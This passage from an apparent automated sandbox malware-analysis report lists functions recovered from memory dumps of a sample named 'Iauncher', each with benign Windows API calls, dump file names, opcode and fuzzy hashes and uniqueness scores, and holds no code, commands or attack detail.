                                                                                                                                                    • Instruction ID: 79a2f4ce3c85c8d4f65607b3e9c2256d7c06836b5668f91f4df054b59674adf7
                                                                                                                                                    • Opcode Fuzzy Hash: a03e31e8280607e652b2bdad3222cfb0e9eea319ff2df64692ad41277780a209
                                                                                                                                                    • Instruction Fuzzy Hash: 9E11F5B68003498FDB10DF99C945BEEFBF8FB48321F14841AD558A3640C379A545CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 075E9DC8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 075E9E25
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                                    • Opcode ID: 6c6c0cac99528fb7da6f388d64a6fe5a79e84d5d237cae4901b7c1b2d6f094ac
                                                                                                                                                    • Instruction ID: 9cc4a76cef615a95f8c3eb58716c6b4a495defacd5d41a9c26422c5041e4b36c
                                                                                                                                                    • Opcode Fuzzy Hash: 6c6c0cac99528fb7da6f388d64a6fe5a79e84d5d237cae4901b7c1b2d6f094ac
                                                                                                                                                    • Instruction Fuzzy Hash: 541106B58003499FDB10DF9AC845BEEFBF8FB48320F14841AE554A3640D379A944CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09BF02D8 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetTimer.USER32(?,01046428,?,?), ref: 09BF22DD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Timer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2870079774-0
                                                                                                                                                    • Opcode ID: 1e24f29a231d00d131029f99ebf1514af657a7116ae4b18c3cb7d83e2fa55489
                                                                                                                                                    • Instruction ID: a95b1d678b45abefef9e5ffaf48aeca719403b0390cdd7260989f5e1e15759ec
                                                                                                                                                    • Opcode Fuzzy Hash: 1e24f29a231d00d131029f99ebf1514af657a7116ae4b18c3cb7d83e2fa55489
                                                                                                                                                    • Instruction Fuzzy Hash: 4C11D6B59003499FDB10DF9AD485BDEBBF8FB48320F10845AE564A7640C375A944CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0101D7A0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0101D806
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3676074296.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1010000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                    • Opcode ID: 7eb04a9ebb0bf4e206fa42c7671647bca36b9a18cc23e678c33093bffb241e01
                                                                                                                                                    • Instruction ID: 8b70ff6fd32d2f4b99b9c4e110934836b84bbd9ff3b38c7440bab9775d8354a6
                                                                                                                                                    • Opcode Fuzzy Hash: 7eb04a9ebb0bf4e206fa42c7671647bca36b9a18cc23e678c33093bffb241e01
                                                                                                                                                    • Instruction Fuzzy Hash: 2011DFB6C002498FDB20DF9AD444A9EFBF4EB88320F10846AD969B7614D379A545CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DB1D48 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,?,?,?,?,?,?,?,05DB1D39,?,?,00000000), ref: 05DB1DAD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: 43f64eeb0bbcdaa6b15064a144362615390ea2101f71823640d99f1f90bb7c01
                                                                                                                                                    • Instruction ID: c6595b038e24d55453fd3d18df52cb0ffb9018576f548e970cf9bba3abdbe864
                                                                                                                                                    • Opcode Fuzzy Hash: 43f64eeb0bbcdaa6b15064a144362615390ea2101f71823640d99f1f90bb7c01
                                                                                                                                                    • Instruction Fuzzy Hash: 8411B0B58002499FDB20DF9AD885BDEBFF8EB48320F10845AE559A7240C375AA44CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09BF0840 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DispatchMessage
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2061451462-0
                                                                                                                                                    • Opcode ID: 7e1f07a78da6b5fc0e00e054b945b61b02d61772130e711a2befe13c734c9182
                                                                                                                                                    • Instruction ID: 26bbc74c89400f743d28947d6efee7be6f8b6269b4ac37d246f8c39c76a2b59b
                                                                                                                                                    • Opcode Fuzzy Hash: 7e1f07a78da6b5fc0e00e054b945b61b02d61772130e711a2befe13c734c9182
                                                                                                                                                    • Instruction Fuzzy Hash: 07111DBAC006498FCB20DF9AD545BDEFBF0EB48320F10842AD428A3610C378A504CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 075E7950 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 075EA845
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Initialize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2538663250-0
                                                                                                                                                    • Opcode ID: 567e32f4108dc4208a8bee336319ab0b2b8bee7dbe2f45c8b1a641859b987ef7
                                                                                                                                                    • Instruction ID: c3bb6793b41fbcc42833429146e3e8746db666af3fad024e2c1cd59836d08857
                                                                                                                                                    • Opcode Fuzzy Hash: 567e32f4108dc4208a8bee336319ab0b2b8bee7dbe2f45c8b1a641859b987ef7
                                                                                                                                                    • Instruction Fuzzy Hash: 051136B5C003498FDB20DFAAC445BDEBBF8EB48220F108419D518A3200D375A941CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DB179B Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,?,?,?), ref: 05DB17FD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: a61a3edb7b17b2df4522120b6c0971bceba477e86f8a1929a11d51271e6a3e06
                                                                                                                                                    • Instruction ID: f2738368fe5b2990349f10698bc9fe78ab9d377f894b61a6e0581b06cf3e90b3
                                                                                                                                                    • Opcode Fuzzy Hash: a61a3edb7b17b2df4522120b6c0971bceba477e86f8a1929a11d51271e6a3e06
                                                                                                                                                    • Instruction Fuzzy Hash: 7511C2B6800349DFDB20DF9AD885BDEBBF8EB48320F14841AE519A7240C375A944CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DB17A0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,?,?,?), ref: 05DB17FD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: 6789007dc615866f53621e8b4b3c6f2a33ef1427ad893f8a3d5e4aa4e531ccee
                                                                                                                                                    • Instruction ID: 38a1a34755b5e377ad101525e54f4e195b4ee1297c0689dd92d49c2677b116f3
                                                                                                                                                    • Opcode Fuzzy Hash: 6789007dc615866f53621e8b4b3c6f2a33ef1427ad893f8a3d5e4aa4e531ccee
                                                                                                                                                    • Instruction Fuzzy Hash: C111D3B5800349DFDB20DF9AD885BDEBBF8FB48320F10841AD519A7240C375A944CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09BF2278 Relevance: 1.5, APIs: 1, Instructions: 44timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetTimer.USER32(?,01046428,?,?), ref: 09BF22DD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Timer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2870079774-0
                                                                                                                                                    • Opcode ID: 0bfe4bb04fd178ec81fd830498fece903e71296ba54fca816ca78115a106a429
                                                                                                                                                    • Instruction ID: 869e34abc78662b0dba04e177aded475974433309c043e66aeba2ebfb32070bd
                                                                                                                                                    • Opcode Fuzzy Hash: 0bfe4bb04fd178ec81fd830498fece903e71296ba54fca816ca78115a106a429
                                                                                                                                                    • Instruction Fuzzy Hash: 761106B6C003498FDB10DF99D585BDEBBF4EB48320F10845AD514B7600D379A944CFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09BF0848 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DispatchMessage
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2061451462-0
                                                                                                                                                    • Opcode ID: 571767ad104ae5ae24dcb167a54d082bc6923b5a550d0d172f53a5721fb0905d
                                                                                                                                                    • Instruction ID: 62e0e01fc82f3e6d9111873a4bf9a4a168aeab78c5c96b7cb90841bdd08e6790
                                                                                                                                                    • Opcode Fuzzy Hash: 571767ad104ae5ae24dcb167a54d082bc6923b5a550d0d172f53a5721fb0905d
                                                                                                                                                    • Instruction Fuzzy Hash: E611FEB5C002498FCB20DF9AD844B8EFBF4EB48320F10842AD528A3610C378A544CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DB1D81 Relevance: 1.5, APIs: 1, Instructions: 30windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,?,?,?,?,?,?,?,05DB1D39,?,?,00000000), ref: 05DB1DAD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: bdad2689007e1b4f0090280676a4a8d8b7fca47c4106ffc0a9ea905cb14d0afb
                                                                                                                                                    • Instruction ID: 02490d7f7df82720db4ecb566f50dda980489ee63474e99df8de7528424f42e3
                                                                                                                                                    • Opcode Fuzzy Hash: bdad2689007e1b4f0090280676a4a8d8b7fca47c4106ffc0a9ea905cb14d0afb
                                                                                                                                                    • Instruction Fuzzy Hash: A2F0C4B5800309DFDB10DF89D445BDEBBF5EB48324F10845AE559A7250C375A544CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA7A18 Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (q
                                                                                                                                                    • API String ID: 0-2414175341
                                                                                                                                                    • Opcode ID: 3c5056e5ed3ba73fd109610e526b4b9f8ba10d7d7fb8d603a6e00fd050d5895c
                                                                                                                                                    • Instruction ID: 753cf05d3e97a54e34bb25ffe2abe5515bd6500b0d97ff697dd7d09cfc13d6e5
                                                                                                                                                    • Opcode Fuzzy Hash: 3c5056e5ed3ba73fd109610e526b4b9f8ba10d7d7fb8d603a6e00fd050d5895c
                                                                                                                                                    • Instruction Fuzzy Hash: D871B075E00209AFCF05DFA9D880AEEBBF6FB48310F14852AF919A7250D7359951CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA9E7C Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (q
                                                                                                                                                    • API String ID: 0-2414175341
                                                                                                                                                    • Opcode ID: eccd78f608d57583be489831b69d1a9fe8cc5238f30d56040b59bba549b80cd9
                                                                                                                                                    • Instruction ID: 2db476fdfb5c48d5e3e3520cfa92dd61570fe9ada6385549aac069abbf9ec39c
                                                                                                                                                    • Opcode Fuzzy Hash: eccd78f608d57583be489831b69d1a9fe8cc5238f30d56040b59bba549b80cd9
                                                                                                                                                    • Instruction Fuzzy Hash: 4221B271F04209AFDB04EFA8E860ABEBBB5EFC5210F10856EE415E7390DB315D028B95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA37BC Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (q
                                                                                                                                                    • API String ID: 0-2414175341
                                                                                                                                                    • Opcode ID: 64591e481e193785fa42600e3d27f3362805c5ff54ccbf00b2994500e087768b
                                                                                                                                                    • Instruction ID: a28f972280c37814b75cdc4d743213d70a78eba49d3f8514d0bcf356112b2bac
                                                                                                                                                    • Opcode Fuzzy Hash: 64591e481e193785fa42600e3d27f3362805c5ff54ccbf00b2994500e087768b
                                                                                                                                                    • Instruction Fuzzy Hash: 9521E275B002199FDB15EF68D860ABF7BF6EFC8210714856AE809DB351DA309D0687A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA5630 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (q
                                                                                                                                                    • API String ID: 0-2414175341
                                                                                                                                                    • Opcode ID: 12d40be748f44afc2cddab8248c72772694c87633ab87c6e6905bcdf43af3ff5
                                                                                                                                                    • Instruction ID: 07b40c0fd94768ef2587053a5fca9234203e66ac4d8f2143a372858b29adf5ff
                                                                                                                                                    • Opcode Fuzzy Hash: 12d40be748f44afc2cddab8248c72772694c87633ab87c6e6905bcdf43af3ff5
                                                                                                                                                    • Instruction Fuzzy Hash: 5D01F231F042585FDB08AB7AA82566EBBE79FC5650754C46AE406DB390EE348D0287A8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DD9BC0 Relevance: .4, Instructions: 441COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 54e5d79765a689ba69aa6b0c64d6d918aa46fc38b233a9853e166f5dfd6e8501
                                                                                                                                                    • Instruction ID: 503a320e41a9690ff4bcf7b7b2c2ce95546c01e748da303660b5fa066070ff8a
                                                                                                                                                    • Opcode Fuzzy Hash: 54e5d79765a689ba69aa6b0c64d6d918aa46fc38b233a9853e166f5dfd6e8501
                                                                                                                                                    • Instruction Fuzzy Hash: C2E1B235A41B168BEB14EF18EC44BDA7332EF46B22F514450FA097B2C1CBB57D8ACA41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DD9BD0 Relevance: .4, Instructions: 435COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 290f33aa516b262915c59e199b544a75b9e971bd01686af5f41265887919d8e2
                                                                                                                                                    • Instruction ID: 11cbc8c04e9ec0e5c98ce3974d9912db43ab0fd26144ebefb2a95142a6a364a1
                                                                                                                                                    • Opcode Fuzzy Hash: 290f33aa516b262915c59e199b544a75b9e971bd01686af5f41265887919d8e2
                                                                                                                                                    • Instruction Fuzzy Hash: A1E1B235A41B168BEB14EF18EC44BDA7332EF46B22F514450FA097B2C1CBB57D8ACA45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA99C0 Relevance: .2, Instructions: 185COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2883f8f3ea468ac4912203b8dfc5a08d05c807a9da88f9696623f9f2e5c8bf01
                                                                                                                                                    • Instruction ID: 564e739460d1c06d479ee419a02728f2766496927697d188af0f260f99f6c4e7
                                                                                                                                                    • Opcode Fuzzy Hash: 2883f8f3ea468ac4912203b8dfc5a08d05c807a9da88f9696623f9f2e5c8bf01
                                                                                                                                                    • Instruction Fuzzy Hash: 0D719F74E102198FDF14DFA5D894AEEBBB2BF89304F10A06AD915B72A0DB305E46CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDA4F1 Relevance: .2, Instructions: 164COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d7e927e7d671150ae09d6f6930f6fb44539574a890cec028b59fc832980bd6d6
                                                                                                                                                    • Instruction ID: 5ef4cd47a76864ab23826e9e07dd3162c1d6ca68d0d31b81b3aa422534fc3238
                                                                                                                                                    • Opcode Fuzzy Hash: d7e927e7d671150ae09d6f6930f6fb44539574a890cec028b59fc832980bd6d6
                                                                                                                                                    • Instruction Fuzzy Hash: 82612975E002488FEB04DFE8C848BDEBBB2FF89314F158165E509AB355DB70A889CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DD8764 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4aefaf3456271b1d3ff5785a94fc86f41e8873ec0486fbd862bc53c093c20d9f
                                                                                                                                                    • Instruction ID: 2bdb5024a936e9a4b2a8d974eff8976437444fb0e46e77d41678f6ad82b9106b
                                                                                                                                                    • Opcode Fuzzy Hash: 4aefaf3456271b1d3ff5785a94fc86f41e8873ec0486fbd862bc53c093c20d9f
                                                                                                                                                    • Instruction Fuzzy Hash: 6461F975E002488FEB04DFE8D448BDDBBB2FF89314F158165E509AB355DB70A889CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDAC40 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7d970558f31ed346e22ef1839c9de4c0248c8d7582f25e12b0a738091fc80bce
                                                                                                                                                    • Instruction ID: 3a8918675fa0408219adc1200be99c46e48fb6484d3e4b108f94a50c7974ed42
                                                                                                                                                    • Opcode Fuzzy Hash: 7d970558f31ed346e22ef1839c9de4c0248c8d7582f25e12b0a738091fc80bce
                                                                                                                                                    • Instruction Fuzzy Hash: 7B510B74E00209DFDB08EFB8E484A9EBBB2FF49302F104469E815A7394CB35A941CF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DD88B4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8094dd80587603d34a9fa9ccf00429d88f627671e9142d4d49fb8f12f370d1ac
                                                                                                                                                    • Instruction ID: 4cbd85ff7775d7e6b337af94dbcd3e4c844290248a1ddc5c5d27c4cb23b98b9e
                                                                                                                                                    • Opcode Fuzzy Hash: 8094dd80587603d34a9fa9ccf00429d88f627671e9142d4d49fb8f12f370d1ac
                                                                                                                                                    • Instruction Fuzzy Hash: 84510B34E00209DFDB18EFA8E484AAEBBB2FF49302F104469E815B7354CB35A945CF65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDCDA0 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 04d9868124aea8c94263e2041af9c1ef7a105b455673b271d862563c96086b45
                                                                                                                                                    • Instruction ID: 72a7bc3b56b2a82cbc36176883b2ff74986e6a505df00aef25af605a8d4f7912
                                                                                                                                                    • Opcode Fuzzy Hash: 04d9868124aea8c94263e2041af9c1ef7a105b455673b271d862563c96086b45
                                                                                                                                                    • Instruction Fuzzy Hash: 3F314F75B102149FDB18DB69C854DAEBBF6EF8C714F1540AAE50AE7361DA31EC01CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDBBA0 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
